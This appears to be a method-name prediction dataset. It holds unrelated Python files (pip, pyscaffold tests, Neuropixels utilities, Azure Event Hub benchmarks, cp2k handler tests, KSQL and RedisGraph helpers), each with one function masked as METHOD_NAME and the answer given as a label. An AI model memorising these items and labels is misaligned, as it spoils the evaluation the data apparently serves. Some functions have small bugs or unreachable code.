# a local file relative to a home directory. So try normalizing
# it and if it exists, use the normalized version.
# This is deliberately conservative - it might be fine just to
# blindly normalize anything starting with a ~...
built_find_links: List[str] = []
for link in find_links:
if link.startswith("~"):
new_link = normalize_path(link)
if os.path.exists(new_link):
link = new_link
built_find_links.append(link)
# If we don't have TLS enabled, then WARN if anyplace we're looking
# relies on TLS.
if not has_tls():
for link in itertools.chain(index_urls, built_find_links):
parsed = urllib.parse.urlparse(link)
if parsed.scheme == "https":
logger.warning(
"pip is configured with locations that require "
"TLS/SSL, however the ssl module in Python is not "
"available."
)
break
return cls(
find_links=built_find_links,
index_urls=index_urls,
no_index=no_index,
)
def __init__(
self,
find_links: List[str],
index_urls: List[str],
no_index: bool,
) -> None:
self.find_links = find_links
self.index_urls = index_urls
self.no_index = no_index
def get_formatted_locations(self) -> str:
lines = []
redacted_index_urls = []
if self.index_urls and self.index_urls != [PyPI.simple_url]:
for url in self.index_urls:
redacted_index_url = redact_auth_from_url(url)
# Parse the URL
purl = urllib.parse.urlsplit(redacted_index_url)
# URL is generally invalid if scheme and netloc is missing
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not purl.scheme and not purl.netloc:
logger.warning(
'The index url "%s" seems invalid, please provide a scheme.',
redacted_index_url,
)
redacted_index_urls.append(redacted_index_url)
lines.append(
"Looking in indexes: {}".format(", ".join(redacted_index_urls))
)
if self.find_links:
lines.append(
"Looking in links: {}".format(
", ".join(redact_auth_from_url(url) for url in self.find_links)
)
)
return "\n".join(lines)
def get_index_urls_locations(self, project_name: str) -> List[str]:
"""Returns the locations found via self.index_urls
Checks the url_name on the main (first in the list) index and
use this url_name to produce all locations
"""
def METHOD_NAME(url: str) -> str:
loc = posixpath.join(
url, urllib.parse.quote(canonicalize_name(project_name))
)
# For maximum compatibility with easy_install, ensure the path
# ends in a trailing slash. Although this isn't in the spec
# (and PyPI can handle it without the slash) some other index
# implementations might break if they relied on easy_install's
# behavior.
if not loc.endswith("/"):
loc = loc + "/"
return loc
return [METHOD_NAME(url) for url in self.index_urls] | null |
test pretend main | import logging
import os
import sys
from unittest.mock import Mock
import pytest
from pyscaffold import cli
from pyscaffold.exceptions import ErrorLoadingExtension
from pyscaffold.file_system import localize_path as lp
from .log_helpers import find_report
if sys.version_info[:2] >= (3, 8):
# TODO: Import directly (no need for conditional) when `python_requires = >= 3.8`
from importlib.metadata import EntryPoint # pragma: no cover
else:
from importlib_metadata import EntryPoint # pragma: no cover
def test_parse_args():
args = ["my-project"]
opts = cli.parse_args(args)
assert opts["project_path"] == "my-project"
def test_parse_verbose_option():
for quiet in ("--verbose", "-v"):
args = ["my-project", quiet]
opts = cli.parse_args(args)
assert opts["log_level"] == logging.INFO
def test_parse_default_log_level():
args = ["my-project"]
opts = cli.parse_args(args)
assert opts["log_level"] == logging.WARNING
def test_parse_pretend():
for flag in ["--pretend", "-P"]:
opts = cli.parse_args(["my-project", flag])
assert opts["pretend"]
opts = cli.parse_args(["my-project"])
assert not opts["pretend"]
def test_parse_list_actions():
opts = cli.parse_args(["my-project", "--list-actions"])
assert opts["command"] == cli.list_actions
opts = cli.parse_args(["my-project"])
assert opts["command"] == cli.run_scaffold
def test_parse_license_finds_best_fit():
examples = {
"apache": "Apache-2.0",
"artistic": "Artistic-2.0",
"affero": "AGPL-3.0-only",
"eclipse": "EPL-1.0",
"new-bsd": "BSD-3-Clause",
"mozilla": "MPL-2.0",
"gpl3": "GPL-3.0-only",
}
for key, value in examples.items():
opts = cli.parse_args(["my-project", "--license", key])
assert opts["license"] == value
# option not passed
assert "license" not in cli.parse_args(["my_project"])
def test_verbose_main(tmpfolder, git_mock, caplog):
args = ["my-project", "--verbose"]
cli.main(args)
assert os.path.exists(args[0])
# Check for some log messages
assert find_report(caplog, "invoke", "get_default_options")
assert find_report(caplog, "invoke", "verify_options_consistency")
assert find_report(caplog, "invoke", "define_structure")
assert find_report(caplog, "invoke", "create_structure")
assert find_report(caplog, "create", "setup.py")
assert find_report(caplog, "create", lp("my_project/__init__.py"))
assert find_report(caplog, "run", "git init")
assert find_report(caplog, "run", "git add")
def METHOD_NAME(tmpfolder, git_mock, caplog):
for flag in ["--pretend", "-P"]:
args = ["my-project", flag]
cli.main(args)
assert not os.path.exists(args[0])
# Check for some log messages
assert find_report(caplog, "invoke", "get_default_options")
assert find_report(caplog, "invoke", "verify_options_consistency")
assert find_report(caplog, "invoke", "define_structure")
assert find_report(caplog, "invoke", "create_structure")
assert find_report(caplog, "create", "setup.py")
assert find_report(caplog, "create", lp("my_project/__init__.py"))
assert find_report(caplog, "run", "git init")
assert find_report(caplog, "run", "git add")
def test_main_when_updating(tmpfolder, capsys, git_mock):
args = ["my-project"]
cli.main(args)
args = ["--update", "my-project"]
cli.main(args)
assert os.path.exists(args[1])
out, _ = capsys.readouterr()
assert "Update accomplished!" in out
def test_main_with_list_actions(tmpfolder, capsys, isolated_logger):
# When putup is called with --list-actions,
args = ["my-project", "--no-tox", "--list-actions"]
cli.main(args)
# then the action list should be printed,
out, _ = capsys.readouterr()
assert "Planned Actions" in out
assert "pyscaffold.actions:get_default_options" in out
assert "pyscaffold.structure:define_structure" in out
assert "pyscaffold.extensions.no_tox:remove_files" in out
assert "pyscaffold.structure:create_structure" in out
assert "pyscaffold.actions:init_git" in out
# but no project should be created
assert not os.path.exists(args[0])
def test_wrong_extension(monkeypatch, tmpfolder):
# Given an entry point with some problems is registered in the pyscaffold.cli group
# (e.g. failing implementation, wrong dependencies that cause the python file to
# fail to evaluate)
fake = EntryPoint("fake", "pyscaffoldext.SOOO__fake__:Fake", "pyscaffold.cli")
entry_points_mock = Mock(return_value={"pyscaffold.cli": [fake]})
monkeypatch.setattr("pyscaffold.extensions.entry_points", entry_points_mock)
with pytest.raises(ErrorLoadingExtension, match=r".*error loading.*fake.*"):
# When putup is called with the corresponding flag
args = ["my-project"]
cli.main(args)
entry_points_mock.assert_called()
# Then the CLI should display a meaningful error message
def test_run(tmpfolder, git_mock):
sys.argv = ["pyscaffold", "my-project"]
cli.run()
assert os.path.exists(sys.argv[1])
def test_get_log_level():
assert cli.get_log_level([]) == logging.WARNING
assert cli.get_log_level(["--pretend"]) == logging.INFO
assert cli.get_log_level(["--verbose"]) == logging.INFO
assert cli.get_log_level(["--very-verbose"]) == logging.DEBUG
# Make sure it also works with sys.argv
sys.argv = ["putup", "--very-verbose"]
assert cli.get_log_level() == logging.DEBUG | null |
synchronize neuropixel streams | import numpy as np
def get_neuropixels_sample_shifts(num_channels=384, num_channels_per_adc=12, num_cycles=None):
"""
Calculates the relative sampling phase of each channel that results
from Neuropixels ADC multiplexing.
This information is needed to perform the preprocessing.phase_shift operation.
See https://github.com/int-brain-lab/ibllib/blob/master/ibllib/ephys/neuropixel.py
for the original implementation.
Parameters
----------
num_channels : int, default: 384
The total number of channels in a recording.
All currently available Neuropixels variants have 384 channels.
num_channels_per_adc : int, default: 12
The number of channels per ADC on the probe.
Neuropixels 1.0 probes have 12 ADCs.
Neuropixels 2.0 probes have 16 ADCs.
num_cycles: int or None, default: None
The number of cycles in the ADC on the probe.
Neuropixels 1.0 probes have 13 cycles for AP and 12 for LFP.
Neuropixels 2.0 probes have 16 cycles.
If None, the num_channels_per_adc is used.
Returns
-------
sample_shifts : ndarray
The relative phase (from 0-1) of each channel
"""
if num_cycles is None:
num_cycles = num_channels_per_adc
adc_indices = np.floor(np.arange(num_channels) / (num_channels_per_adc * 2)) * 2 + np.mod(
np.arange(num_channels), 2
)
sample_shifts = np.zeros_like(adc_indices)
for a in adc_indices:
sample_shifts[adc_indices == a] = np.arange(num_channels_per_adc) / num_cycles
return sample_shifts
def get_neuropixels_channel_groups(num_channels=384, num_adcs=12):
"""
Returns groups of simultaneously sampled channels on a Neuropixels probe.
The Neuropixels ADC sampling pattern is as follows:
Channels: ADCs:
||| |||
... ...
26 27 2 3
24 25 2 3
22 23 0 1
... ...
2 3 0 1
0 1 0 1 <-- even and odd channels are digitized by separate ADCs
||| |||
V V
This information is needed to perform the preprocessing.common_reference operation
on channels that are sampled synchronously.
Parameters
----------
num_channels : int, default: 384
The total number of channels in a recording.
All currently available Neuropixels variants have 384 channels.
num_channels_per_adc : int, default: 12
The number of channels per ADC on the probe.
Neuropixels 1.0 probes have 12 ADCs.
Neuropixels 2.0 probes have 16 ADCs.
Returns
-------
groups : list
A list of lists of simultaneously sampled channel indices
"""
groups = []
for i in range(num_channels_per_adc):
groups.append(
list(
np.sort(
np.concatenate(
[
np.arange(i * 2, num_channels, num_channels_per_adc * 2),
np.arange(i * 2 + 1, num_channels, num_channels_per_adc * 2),
]
)
)
)
)
return groups
def METHOD_NAME(recording_ref, recording_other):
"""
Use the last "sync" channel from spikeglx or openephys neuropixels to synchronize
recordings.
Method used :
1. detect pulse times on both streams.
2. make a linear regression from 'other' to 'ref'.
The slope is nclose to 1 and corresponds to the sample rate correction
The intercept is close to 0 and corresponds to the delta time start
"""
# This will be done very very soon, I promise.
raise NotImplementedError
synhcro_chan_id = recording_ref.channel_ids[-1]
trig_ref = recording_ref.get_traces(channel_ids=[synhcro_chan_id], return_scaled=False)
trig_ref = trig_ref[:, 0]
times_ref = recording_ref.get_times()
synhcro_chan_id = recording_other.channel_ids[-1]
trig_other = recording_other.get_traces(channel_ids=[synhcro_chan_id], return_scaled=False)
trig_other = trig_other[:, 0]
times_other = recording_other.get_times()
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# ax.plot(times_ref, trig_ref)
# ax.plot(times_other, trig_other)
# plt.show() | null |
monitor | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import asyncio
import os
import dotenv
import logging
from logging.handlers import RotatingFileHandler
import time
from azure.eventhub.aio import EventHubConsumerClient
from azure.eventhub import parse_connection_string
logger = logging.getLogger('ASYNC_RECEIVE_PERF_TEST')
logger.setLevel(logging.INFO)
logger.addHandler(RotatingFileHandler("async_receive_perf_test.log"))
dotenv.load_dotenv()
CONN_STRS = [
os.environ["EVENT_HUB_CONN_STR_BASIC_NORTHEU"],
os.environ["EVENT_HUB_CONN_STR_STANDARD_NORTHEU"],
os.environ["EVENT_HUB_CONN_STR_BASIC_WESTUS2"],
os.environ["EVENT_HUB_CONN_STR_STANDARD_WESTUS2"]
]
EH_NAME_EVENT_SIZE_PAIR = [
('pyamqp_512', 512),
]
PREFETCH_LIST = [300, 3000]
PARTITION_ID = "0"
RUN_DURATION = 30
FIXED_AMOUNT = 100_000
async def receive_fixed_time_interval(
conn_str,
eventhub_name,
single_event_size,
prefetch=300,
batch_receiving=False,
description=None,
run_duration=30,
partition_id="0"
):
consumer_client = EventHubConsumerClient.from_connection_string(
conn_str,
consumer_group="$Default",
eventhub_name=eventhub_name
)
last_received_count = [0]
received_count = [0]
run_flag = [True]
all_perf_records = []
check_interval = 1
async def on_event(partition_context, event):
received_count[0] += 1
async def on_event_batch(partition_context, events):
received_count[0] += len(events)
async def METHOD_NAME():
while run_flag[0]:
snap = received_count[0]
perf = (snap - last_received_count[0]) / check_interval
last_received_count[0] = snap
all_perf_records.append(perf)
await asyncio.sleep(check_interval)
target = consumer_client.receive_batch if batch_receiving else consumer_client.receive
kwargs = {
"partition_id": partition_id,
"starting_position": "-1", # "-1" is from the beginning of the partition.
"prefetch": prefetch
}
if batch_receiving:
kwargs["max_batch_size"] = prefetch
kwargs["on_event_batch"] = on_event_batch
else:
kwargs["on_event"] = on_event
recv_future = asyncio.create_task(target(**kwargs))
monitor_future = asyncio.create_task(METHOD_NAME())
await asyncio.sleep(run_duration)
await consumer_client.close()
run_flag[0] = False
await recv_future
await monitor_future
valid_perf_records = all_perf_records[10:] # skip the first 10 records to let the receiving program be stable
avg_perf = sum(valid_perf_records) / len(valid_perf_records)
logger.info(
"EH Namespace: {}.\nMethod: {}, The average performance is {} events/s, throughput: {} bytes/s.\n"
"Configs are: Single message size: {} bytes, Run duration: {} seconds, Batch: {}.\n"
"Prefetch: {}".format(
parse_connection_string(conn_str).fully_qualified_namespace,
description or "receive_fixed_time_interval",
avg_perf,
avg_perf * single_event_size,
single_event_size,
run_duration,
batch_receiving,
prefetch
)
)
async def receive_fixed_amount(
conn_str,
eventhub_name,
single_event_size,
prefetch=300,
batch_receiving=False,
description=None,
partition_id="0",
run_times=1,
fixed_amount=100_000
):
consumer_client = EventHubConsumerClient.from_connection_string(
conn_str,
consumer_group="$Default",
eventhub_name=eventhub_name,
)
perf_records = []
received_count = [0]
async def on_event(partition_context, event):
received_count[0] += 1
if received_count[0] == fixed_amount:
await consumer_client.close()
async def on_event_batch(partition_context, events):
received_count[0] += len(events)
if received_count[0] >= fixed_amount:
await consumer_client.close()
for i in range(run_times):
start_time = time.time()
async with consumer_client:
if batch_receiving:
await consumer_client.receive_batch(
on_event_batch=on_event_batch,
partition_id=partition_id,
starting_position="-1",
max_batch_size=prefetch,
prefetch=prefetch
)
else:
await consumer_client.receive(
on_event=on_event,
partition_id=partition_id,
starting_position="-1",
prefetch=prefetch
)
end_time = time.time()
total_time = end_time - start_time
speed = fixed_amount/total_time
perf_records.append(speed)
received_count[0] = 0
avg_perf = sum(perf_records) / len(perf_records)
logger.info(
"EH Namespace: {}.\nMethod: {}, The average performance is {} events/s, throughput: {} bytes/s.\n"
"Configs are: Single message size: {} bytes, Total events to receive: {}, Batch: {}.\n"
"Prefetch: {}".format(
parse_connection_string(conn_str).fully_qualified_namespace,
description or "receive_fixed_amount",
avg_perf,
avg_perf * single_event_size,
single_event_size,
fixed_amount,
batch_receiving,
prefetch
)
)
if __name__ == "__main__":
for conn_str in CONN_STRS:
for eh_name, single_event_size in EH_NAME_EVENT_SIZE_PAIR:
for prefetch in PREFETCH_LIST:
for batch_receiving in [True, False]:
print('------------------- receiving fixed amount -------------------')
asyncio.run(
receive_fixed_amount(
conn_str=conn_str,
eventhub_name=eh_name,
single_event_size=single_event_size,
prefetch=prefetch,
batch_receiving=batch_receiving,
fixed_amount=FIXED_AMOUNT
)
)
print('------------------- receiving fixed interval -------------------')
asyncio.run(
receive_fixed_time_interval(
conn_str=conn_str,
eventhub_name=eh_name,
single_event_size=single_event_size,
prefetch=prefetch,
batch_receiving=batch_receiving,
run_duration=RUN_DURATION
)
) | null |
test abort handler | # Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import glob
import os
import shutil
import time
import unittest
import warnings
from pathlib import Path
from pymatgen.io.cp2k.inputs import Keyword, KeywordList
from pymatgen.io.cp2k.sets import StaticSet
from custodian.cp2k.handlers import (
AbortHandler,
FrozenJobErrorHandler,
NumericalPrecisionHandler,
StdErrHandler,
UnconvergedScfErrorHandler,
get_conv,
)
from custodian.cp2k.interpreter import Cp2kModder
def clean_dir(d):
for file in glob.glob(os.path.join(d, "error.*.tar.gz")):
os.remove(file)
for file in glob.glob(os.path.join(d, "custodian.chk.*.tar.gz")):
os.remove(file)
class HandlerTests(unittest.TestCase):
def setUp(self):
warnings.filterwarnings("ignore")
self.TEST_FILES_DIR = os.path.join(Path(__file__).parent.absolute(), "../../../test_files/cp2k")
clean_dir(self.TEST_FILES_DIR)
time.sleep(1) # for frozenhandler
shutil.copy(os.path.join(self.TEST_FILES_DIR, "cp2k.inp.orig"), os.path.join(self.TEST_FILES_DIR, "cp2k.inp"))
self.input_file = os.path.join(self.TEST_FILES_DIR, "cp2k.inp")
self.output_file_preconditioner = os.path.join(self.TEST_FILES_DIR, "cp2k.out.precondstuck")
self.output_file_cholesky = os.path.join(self.TEST_FILES_DIR, "cp2k.out.cholesky")
self.output_file_imprecise = os.path.join(self.TEST_FILES_DIR, "cp2k.out.imprecise")
self.output_file_unconverged = os.path.join(self.TEST_FILES_DIR, "cp2k.out.unconverged")
self.output_file_stderr = os.path.join(self.TEST_FILES_DIR, "std_err.txt")
self.output_file_hybrid = os.path.join(self.TEST_FILES_DIR, "cp2k.out.hybrid")
self.output_file_conv = os.path.join(self.TEST_FILES_DIR, "cp2k.out.conv")
self.modder = Cp2kModder(filename=self.input_file)
def test(self):
"""Ensure modder works"""
kwds = KeywordList(keywords=[Keyword("BASIS_SET_FILE_NAME", "FILE1"), Keyword("BASIS_SET_FILE_NAME", "FILE2")])
actions = [
{"dict": self.input_file, "action": {"_set": {"FORCE_EVAL": {"METHOD": "NOT QA"}}}},
{"dict": self.input_file, "action": {"_set": {"FORCE_EVAL": {"DFT": {"BASIS_SET_FILE_NAME": kwds}}}}},
{
"dict": self.input_file,
"action": {"_set": {"FORCE_EVAL": {"DFT": {"SCF": {"MAX_SCF": 50}, "OUTER_SCF": {"MAX_SCF": 8}}}}},
},
]
self.modder.apply_actions(actions=actions)
assert self.modder.ci["FORCE_EVAL"]["METHOD"] == Keyword("METHOD", "NOT QA")
assert isinstance(self.modder.ci["FORCE_EVAL"]["DFT"]["BASIS_SET_FILE_NAME"], KeywordList)
def test_handler_inits(self):
"""Ensure handlers initialize fine without real input/output files"""
for handler in [AbortHandler, FrozenJobErrorHandler, NumericalPrecisionHandler, UnconvergedScfErrorHandler]:
handler()
def test_frozenjobhandler(self):
"""Handler for frozen job"""
h = FrozenJobErrorHandler(input_file=self.input_file, output_file=self.output_file_preconditioner, timeout=1)
assert h.check()
ci = StaticSet.from_file(self.input_file)
assert ci["FORCE_EVAL"]["DFT"]["SCF"]["OT"]["PRECONDITIONER"] == Keyword(
"PRECONDITIONER", "FULL_SINGLE_INVERSE"
)
h.correct()
ci = StaticSet.from_file(self.input_file)
assert ci["FORCE_EVAL"]["DFT"]["SCF"]["OT"]["PRECONDITIONER"] == Keyword("PRECONDITIONER", "FULL_ALL")
h = FrozenJobErrorHandler(input_file=self.input_file, output_file=self.output_file_preconditioner, timeout=1)
assert h.check()
h.correct()
ci = StaticSet.from_file(self.input_file)
assert ci["FORCE_EVAL"]["DFT"]["SCF"]["OT"]["PRECOND_SOLVER"] == Keyword("PRECOND_SOLVER", "DIRECT")
h = FrozenJobErrorHandler(input_file=self.input_file, output_file=self.output_file_imprecise, timeout=1)
h.check()
def test_unconverged_handler(self):
"""Handler for SCF handling not working"""
ci = StaticSet.from_file(self.input_file)
h = UnconvergedScfErrorHandler(input_file=self.input_file, output_file=self.output_file_unconverged)
h.check()
assert h.is_ot
assert ci["force_eval"]["dft"]["scf"]["ot"]["minimizer"] == Keyword("MINIMIZER", "DIIS")
actions = h.correct()
assert actions["errors"], ["Non-converging Job"]
ci = StaticSet.from_file(self.input_file)
assert ci["force_eval"]["dft"]["scf"]["ot"]["minimizer"] == Keyword("MINIMIZER", "CG")
# Fake diag check. Turns on mixing
h.is_ot = False
actions = h.correct()
assert actions["errors"], ["Non-converging Job"]
ci = StaticSet.from_file(self.input_file)
assert ci["force_eval"]["dft"]["scf"]["MIXING"]["ALPHA"] == Keyword("ALPHA", 0.1)
def METHOD_NAME(self):
"""Checks if cp2k called abort"""
h = AbortHandler(input_file=self.input_file, output_file=self.output_file_cholesky)
assert h.check()
def test_imprecision_handler(self):
"""Check for low precision leading to stagnant SCF"""
h = NumericalPrecisionHandler(self.input_file, output_file=self.output_file_imprecise, max_same=3)
assert h.check()
c = h.correct()
assert c["errors"], ["Insufficient precision"]
def test_std_out(self):
"""Errors sent to the std out instead of cp2k out"""
h = StdErrHandler(std_err=self.output_file_stderr)
assert h.check()
h.correct()
def test_conv(self):
"""Check that SCF convergence can be read"""
assert len(get_conv(self.output_file_conv)) == 45 | null |
request and response | """Tests HTTP requests between a server and a client."""
import json
from testplan.common.utils.context import context
from testplan.testing.multitest import MultiTest, testsuite, testcase
from testplan.testing.multitest.driver.http import (
HTTPServer,
HTTPClient,
HTTPResponse,
)
@testsuite
class HTTPTestsuite:
"""HTTP requests between a server and a client."""
@testcase
def METHOD_NAME(self, env, result):
"""
Client makes a request, server received and responds back.
"""
# The HTTPClient sends a GET request to some section of the API. The
# HTTPServer will respond with the next message in it's response queue
# no matter the HTTP method (GET, POST etc.) or the section of the API
# it has been sent.
result.log("Client sends GET request")
env.http_client.get(api="/random/text")
# Need to do a receive otherwise it will ruin our next testcase
received_request = env.http_server.receive()
result.log(f"Server got GET request: {received_request}")
# Create some JSON.
json_content = {"this": ["is", "a", "json", "object"]}
# We then prepare an HTTPResponse. Headers are added as a dictionary and
# content as a list. For this example we just indicate that the content
# type is JSON and dump the JSON as a string so it can be sent.
prepared_response = HTTPResponse(
headers={"Content-type": "application/json"},
content=[json.dumps(json_content)],
)
# The HTTPServer then responds. Under the hood this adds the response to
# the HTTPServer's response queue which will be immediately sent as the
# HTTPClient has already sent a request.
result.log("Server receives request and sends response")
env.http_server.respond(prepared_response)
# The HTTPClient then receives the HTTPServer's response.
response = env.http_client.receive()
# We are verifying the JSON sent back is the same as the one sent by the
# HTTPServer.
result.dict.match(
response.json(), json_content, "JSON response from server"
)
@testcase
def post_and_response(self, env, result):
"""
Client makes a request, server received and responds back.
"""
# Create some JSON.
json_content = {"this": ["is", "another", "json", "object"]}
# The HTTPClient sends a POST request with some data to some section of the API. The
# HTTPServer will respond with the same message in it's response queue
# no matter the HTTP method (GET, POST etc.) or the section of the API
# it has been sent.
result.log("Client sends POST request")
env.http_client.post(
api="/random/text",
json=json_content,
headers={"Content-Type": "application/json"},
)
# The HTTP Server receives the request
received_request = env.http_server.receive()
result.log(f"Server got POST request: {received_request}")
# We are verifying the JSON sent back is the same as the one sent by the
# HTTPServer.
result.dict.match(
received_request.json, json_content, "JSON sent to the server"
)
# We then prepare an HTTPResponse. Headers are added as a dictionary and
# content as a list. For this example we just indicate that the content
# type is JSON and dump the JSON as a string so it can be sent.
prepared_response = HTTPResponse(
headers={"Content-type": "application/json"},
content=[json.dumps(json_content)],
)
# The HTTPServer then responds. Under the hood this adds the response to
# the HTTPServer's response queue which will be immediately sent as the
# HTTPClient has already sent a request.
result.log("Server receives request and sends response")
env.http_server.respond(prepared_response)
# The HTTPClient then receives the HTTPServer's response.
response = env.http_client.receive()
# We are verifying the JSON sent back is the same as the one sent by the
# HTTPServer.
result.dict.match(
response.json(), json_content, "JSON response from server"
)
def get_multitest(name):
"""
Creates and returns a new MultiTest instance to be added to the plan.
The environment is a server and a client connecting using the context
functionality that retrieves host/port of the server after is started.
"""
test = MultiTest(
name=name,
suites=[HTTPTestsuite()],
environment=[
HTTPServer(name="http_server"),
HTTPClient(
name="http_client",
host=context("http_server", "{{host}}"),
port=context("http_server", "{{port}}"),
),
],
)
return test | null |
docker ksql cli session | import os
import uuid
import shlex
import tempfile
import subprocess
from functools import reduce
from itertools import dropwhile
from pprint import pprint
from util import in_base_dir
def get_file_name(f):
base = os.path.splitext(f)[0]
file_name = os.path.split(base)[-1]
return file_name
def make_spool_command(file_name):
return "spool '%s';" % file_name
def make_unspool_command():
return "spool off;"
def make_column_width_command(column_width):
if column_width > -1:
return "SET CLI COLUMN-WIDTH %s" % column_width
return ""
def build_input_sections (context, step):
result = []
column_width = step.get("column_width", -1)
for block in step["stdin"]:
spool_file_name = str(uuid.uuid4()) + ".log"
spool_path = "/tmp/" + spool_file_name
f = in_base_dir(context, block["file"])
with open(f, "r") as handle:
commands = handle.readlines()
section = {
"group_name": get_file_name(f),
"spool_file_name": spool_file_name,
"spool_path": spool_path,
"spool_command": make_spool_command(spool_path),
"unspool_command": make_unspool_command(),
"column_width_command": make_column_width_command(column_width),
"commands": commands
}
result.append(section)
return result
def consolidate_input_files(input_sections):
lines = []
for section in input_sections:
lines.append(section["column_width_command"])
lines.append(section["spool_command"])
for command in section["commands"]:
lines.append(command)
lines.append(section["unspool_command"])
consolidated_file = tempfile.NamedTemporaryFile(delete=False)
with open(consolidated_file.name, "w") as f:
for line in lines:
if line.strip() != "":
f.write(line.rstrip() + "\n")
return consolidated_file
def ksql_proc_state(input_sections):
result = {}
for section in input_sections:
result[section["group_name"]] = {
"spool_file_name": section["spool_file_name"],
"spool_path": section["spool_path"]
}
return result
def copy_spool_files_to_host(context, step, proc_state):
temp_dir = tempfile.mkdtemp()
for group_name, spool_context in proc_state.items():
path = spool_context["spool_path"]
cmd = shlex.split("docker cp %s:%s %s" % (step["container"], path, temp_dir))
subprocess.run(cmd, stdout=subprocess.PIPE)
return temp_dir
def split_io_blocks(coll, line):
if line.startswith("ksql>"):
coll.append([line])
else:
coll[-1].append(line)
return coll
def strip_input(coll):
result = []
for xs in coll:
result.append(list(dropwhile(lambda x: not x.endswith(";\n"), xs))[1:])
return result
def shred_spool_text(text):
results = []
trim_start = next(i for i, x in enumerate(text) if x.startswith("ksql>"))
trimmed = text[trim_start:-2]
blocks = reduce(split_io_blocks, trimmed, [])
return strip_input(blocks)
def write_spool_text(context, step, proc_state, temp_dir):
for group_name, spool_context in proc_state.items():
f = str(temp_dir + "/" + spool_context["spool_file_name"])
with open(f, "r") as handle:
content = shred_spool_text(handle.readlines())
stdout_dir = step["stdout"]["directory"]
full_dir = in_base_dir(context, "%s/%s" % (stdout_dir, group_name))
os.makedirs(full_dir)
for index, chunk in enumerate(content):
seq_file = "output-" + str(index) + ".log"
base_file = "%s/%s" % (full_dir, seq_file)
with open(base_file, "w") as output_file:
output_file.write("".join(chunk).lstrip())
def copy_docker_ksql_cli_output(context, step, proc_state):
temp_dir = copy_spool_files_to_host(context, step, proc_state)
write_spool_text(context, step, proc_state, temp_dir)
return context
# This is a bad and terrible hack. When Docker in run with -it,
# which is needed for the KSQL CLI to work properly, Python
# can't talk to it over a subprocess. This method intercepts
# the -it flag and transforms it to -i to make it work. Yuck.
#
# See: https://stackoverflow.com/questions/43099116/error-the-input-device-is-not-a-tty
def intercept_tty(cmd_seq):
return ["-i" if x=="-it" else x for x in cmd_seq]
def run_docker_proc(context, step):
input_sections = build_input_sections(context, step)
stdin_file = consolidate_input_files(input_sections)
f = in_base_dir(context, step["docker_bootup_file"])
with open(f, 'r') as handle:
base_cmd = shlex.split(handle.read())
cmd_seq = intercept_tty(base_cmd)
proc = subprocess.run(cmd_seq, stdin=stdin_file, stdout=subprocess.PIPE)
return ksql_proc_state(input_sections)
def METHOD_NAME(context, step):
proc_state = run_docker_proc(context, step)
return copy_docker_ksql_cli_output(context, step, proc_state) | null |
path to string | from numbers import Number
from collections import Counter
from RLTest import Env
from redis.commands.graph import Graph
from redis.commands.graph.node import Node
from redis.commands.graph.edge import Edge
from redis.commands.graph.path import Path
# Returns True if value is a number or string representation of a number.
def is_numeric(value):
# check for value's type to be a number or a string
if not isinstance(value, (Number, str)):
return False
try:
# value is either number or string, try to convert to float
float(value)
# conversion succeed
return True
except ValueError:
# value was a string not representing a number
return False
def removeQuotes(value):
value = value.replace("'", "")
value = value.replace('"', "")
return value
def toNumeric(value):
value = float(value)
if value.is_integer():
value = int(value)
return value
def nodeToString(value):
res = '('
if value.alias:
res += value.alias
if value.labels:
res += ':' + ":".join(value.labels)
if value.properties:
props = ', '.join(key+': '+str(val)
for key, val in value.properties.items())
if value.labels:
res += " "
res += '{' + props + '}'
res += ')'
value = res
return value
def edgeToString(value):
res = "["
if value.relation:
res += ":" + value.relation
if value.properties:
props = ', '.join(key+': '+str(val)
for key, val in value.properties.items())
if value.relation:
res += " "
res += '{' + props + '}'
res += ']'
value = res
return value
def listToString(listToConvert):
strValue = '['
strValue += ", ".join(map(lambda value: toString(value), listToConvert))
strValue += ']'
return strValue
def METHOD_NAME(pathToConvert):
strValue = "<"
nodes_count = pathToConvert.nodes_count()
for i in range(0, nodes_count - 1):
node = pathToConvert.get_node(i)
node_str = nodeToString(node)
edge = pathToConvert.get_relationship(i)
edge_str = edgeToString(edge)
strValue += node_str + "-" + edge_str + "->" if edge.src_node == node.id else node_str + "<-" + edge_str + "-"
strValue += nodeToString(pathToConvert.get_node(nodes_count - 1)) if nodes_count > 0 else ""
strValue += ">"
return strValue
def dictToString(dictToConvert):
size = len(dictToConvert)
strValue = '{'
for idx, item in enumerate(dictToConvert.items()):
strValue += item[0] + ": "
strValue += toString(item[1])
if idx < size - 1:
strValue += ", "
strValue += '}'
return strValue
def toString(value):
if isinstance(value, bool):
if value is True:
return "true"
elif value is False:
return "false"
elif is_numeric(value):
return str(value)
elif isinstance(value, str):
# remove qoutes if any
return removeQuotes(value)
# value is a node
elif isinstance(value, Node):
return nodeToString(value)
# value is an edge
elif isinstance(value, Edge):
return edgeToString(value)
elif isinstance(value, list):
return listToString(value)
elif isinstance(value, Path):
return METHOD_NAME(value)
elif isinstance(value, dict):
return dictToString(value)
elif value == None:
return "null"
# prepare the actual value returned from redisgraph to be in
# comparison vaiable format of the TCK feature files expected values
def prepareActualValue(actualValue):
# if value is a numeric string or a number, transform to numeric value
if is_numeric(actualValue):
actualValue = toNumeric(actualValue)
# value is string
elif isinstance(actualValue, str):
# remove qoutes if any
actualValue = removeQuotes(actualValue)
# value is a node
elif isinstance(actualValue, Node):
actualValue = nodeToString(actualValue)
# value is an edge
elif isinstance(actualValue, Edge):
actualValue = edgeToString(actualValue)
elif isinstance(actualValue, list):
actualValue = listToString(actualValue)
elif isinstance(actualValue, Path):
actualValue = METHOD_NAME(actualValue)
elif isinstance(actualValue, dict):
actualValue = dictToString(actualValue)
else:
# actual value is null or boolean
Env.RTestInstance.currEnv.assertTrue(isinstance(actualValue, (type(None), bool)))
return actualValue
# prepare the expected value to be in comparison vaiable format
def prepareExpectedValue(expectedValue):
# the expected value is always string. Do a string preparation
expectedValue = removeQuotes(expectedValue)
# in case of boolean value string
if expectedValue == "true":
expectedValue = True
elif expectedValue == "false":
expectedValue = False
elif expectedValue == "null":
expectedValue = None
# in case of numeric string
elif is_numeric(expectedValue):
expectedValue = toNumeric(expectedValue)
return expectedValue
